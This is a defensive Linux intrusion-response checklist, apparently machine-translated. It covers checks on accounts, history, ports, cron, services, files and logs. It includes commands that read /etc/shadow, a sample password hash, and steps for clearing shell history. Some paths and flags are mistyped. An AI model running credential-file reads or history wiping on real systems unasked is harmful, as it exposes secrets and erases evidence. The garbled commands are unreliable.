Linux intrusion troubleshooting
1.1 account security
Basic usage:
1,User information file /etc/passwd root:x:0:0:root:/root:/bin/bash account:password:UID:GID:GECOS:directory:shell User name: Password: user ID: group ID: User description: Home Directory: after login shell Note: only local login is allowed without password, and remote login is not allowed 2,Shadow file /etc/shadow root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7::: User name: encryption password: date of last password modification: time interval between two password modifications: password validity: warning days after password modification expires: Grace days after password Expiration: account expiration time: reserved
who View current login user( tty Local login pts (remote login) w Check the system information and want to know the user's behavior at a certain time uptime Check the login time, number of users and load status
Intrusion detection:
1,Query privileged user(uid Is 0)
[root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
2,Query the account information of remote login
[root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
3,except root Is there any other account besides the account sudo jurisdiction. If it is not necessary for management, the ordinary account should be deleted sudo jurisdiction
[root@localhost ~]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
4,Disable or delete redundant and suspicious accounts
usermod -L user Disable account, account cannot log in,/etc/shadow The second column is ! start
userdel user delete user user
userdel -r user Will delete user User, and will /home Directory user Delete the directory together
1.2 historical orders
Basic usage:
Pass bash_history file to view the system commands executed by the account
1,root User's historical commands
histroy
2,open /home Under each account directory .bash_history,View the historical commands executed by ordinary accounts.
Add login for historical commands IP Address, execution time and other information:
1)Save 10000 commands
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
2)stay/etc/profile Add the following line number configuration information at the end of the file:
######jiagu history xianshi#########
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]
then
USER_IP=`hostname`
fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
######### jiagu history xianshi ##########
3)source /etc/profile Make configuration effective
Generation effect: 1 2018-07-10 19:45:39 192.168.204.1 root source /etc/profile
3,Clear history operation command: history -c
However, this command does not clear the records saved in the file, so it needs to be deleted manually .bash_profile Records in the file.
Intrusion detection:
Enter the user directory and export the history command. cat .bash_history >> history.txt
1.3 check the abnormal port
Use the netstat network connection command to analyze the suspicious port, IP and PID
netstat -antlp | more Check next pid Corresponding process file path, function ls -l /proc/$PID/exe or file /proc/$PID/exe($PID Is the corresponding pid No.)
1.4 check the abnormal process
Use the ps command to analyze the process
ps aux | grep pid
1.5 check startup items
Basic usage:
Schematic diagram of system operation level:
| Run level | meaning |
|---|---|
| 0 | Shut down |
| 1 | Single user mode, which can be imagined as the security mode of windows, is mainly used for system repair |
| 2 | Incomplete command line mode without NFS service |
| 3 | The complete command line mode is the standard character interface |
| 4 | System retention |
| 5 | Graphic mode |
| 6 | Restart |
View the runlevel command runlevel
System default allowable level
vi /etc/inittab id=3: initdefault #Which operation level does the system enter directly after startup
Boot profile
/etc/rc.local /etc/rc.d/rc[0~6].d
Example: when we need to start our own script, we just need to leave the executable script in / etc / init D directory, and then in / etc / RC d/rc*. D file to establish a soft link.
Note: the * here represents the seven grades of 0, 1, 2, 3, 4, 5 and 6
root@localhost ~]# ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S100ssh
Here, sshd is the script file of the specific service, S100ssh is its soft link, and the beginning of S represents self startup during loading; If it is a script file starting with K, it represents the script file that needs to be closed when the run level is loaded.
Intrusion detection:
Startup item file:
more /etc/rc.local /etc/rc.d/rc[0~6].d ls -l /etc/rc.d/rc3.d/
1.6 check scheduled tasks 80%
Basic use
1. Creating scheduled tasks with crontab
-
Basic command
crontab -l List a user cron Service details Tips: Written by default crontab The file is saved in the (/var/spool/cron/User name e.g: /var/spool/cron/root crontab -r Delete each user cront task(Caution: delete all scheduled tasks) crontab -e Use the editor to edit the current crontab file For example:*/1 * * * * echo "hello world" >> /tmp/test.txt Write files every minute
2. Asynchronous scheduled task scheduling using anacron command
-
Use case
Run every day /home/backup.sh script: vi /etc/anacrontab @daily 10 example.daily /bin/bash /home/backup.sh When the machine is backup.sh It is expected to be shut down when running, anacron It will run ten minutes after the machine starts up, instead of waiting for another seven days.
Intrusion detection
Focus on whether there are malicious scripts in the following directories
/var/spool/cron/* /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/ /etc/anacrontab /var/spool/anacron/*
Tips:
more /etc/cron.daily/* View all files in the directory
7.1 Inspection Service
Service self start
The first modification method:
chkconfig [--level Run level] [Independent service name] [on|off] chkconfig –level 2345 httpd on Turn on self start chkconfig httpd on (default level Yes (2345)
The second modification method:
modify /etc/re.d/rc.local file join /etc/init.d/httpd start
The third modification method:
Using ntsysv command to manage self startup, you can manage independent services and xinetd services.
Intrusion detection
1. Query installed services:
RPM package installed services
chkconfig --list View the service self start status, and you can see all the RPM Package installed services ps aux | grep crond View current service System startup items at levels 3 and 5 Chinese environment chkconfig --list | grep "3:Enable\|5:Enable" English environment chkconfig --list | grep "3:on\|5:on"
Services installed by source package
Check the service installation location, usually in/user/local/ service httpd start search/etc/rc.d/init.d/ Check to see if it exists
1.8 check abnormal documents
1. View sensitive directories, such as files in / tmp directory, and pay attention to hidden folders. Folders named "..." have hidden properties
2. Get the creation time of WEBSHELL and remote control Trojan horse. How to find the files created within the same time range?
You can use the find command to find, such as find /opt -name "*" - atime 1 -type f to find the file accessed by / opt the next day
3. For suspicious files, you can use stat to create and modify the time.
1.9 check the system log
Default log storage location: / var/log/
Check the log configuration: more / etc / rsyslog conf
| log file | explain |
|---|---|
| /var/log/cron | Logs related to system scheduled tasks are recorded |
| /var/log/cups | Log of printing information |
| /var/log/dmesg | It records the information of the kernel self-test when the system is powered on. You can also use the dmesg command to directly view the kernel self-test information |
| /var/log/mailog | Record mail information |
| /var/log/message | A log recording important information of the system. This log file will record most important information of the Linux system. If there is a problem with the system, the first thing to check should be this log file |
| /var/log/btmp | Log the error login log. This file is a binary file and cannot be viewed directly by vi. instead, use the lastb command to view it |
| /var/log/lastlog | Record the log of the last login time of all users in the system. This file is a binary file and cannot be viewed directly by vi. instead, use the lastlog command to view it |
| /var/log/wtmp | Permanently record the login and logout information of all users, and record the startup, restart and shutdown events of the system. Similarly, this file is also a binary file, which cannot be viewed directly by vi, but needs to be viewed by using the last command |
| /var/log/utmp | Record the information of the currently logged in user. This file will change with the login and logout of the user, and only record the information of the currently logged in user. Similarly, this file can't be queried directly by vi, but by using w,who,users and other commands |
| /var/log/secure | Record the authentication and authorization information. Any program involving account and password will be recorded, such as SSH login, su switching users, sudo authorization, and even adding users and modifying user passwords will be recorded in this log file |
Log analysis skills:
1,How many positioning IP In the blasting host root Account number:
grep "Failed password for root" /var/log/secure | awk '{print $11}' | uniq -c | sort -nr | more
What are the positioning IP During blasting:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c
What is a user name dictionary?
grep "Failed password" /var/log/secure| awk '{print $9}' | sort -nr | uniq -c
2,Successful login IP What are:
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
Date of successful login, user name IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
3,Add a user kali journal:
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali
, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
#grep "useradd" /var/log/secure
4,delete user kali journal:
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'
# grep "userdel" /var/log/secure
5,su Switch users:
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)
sudo Authorized execution:
sudo -l
Jul 10 00:43:09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now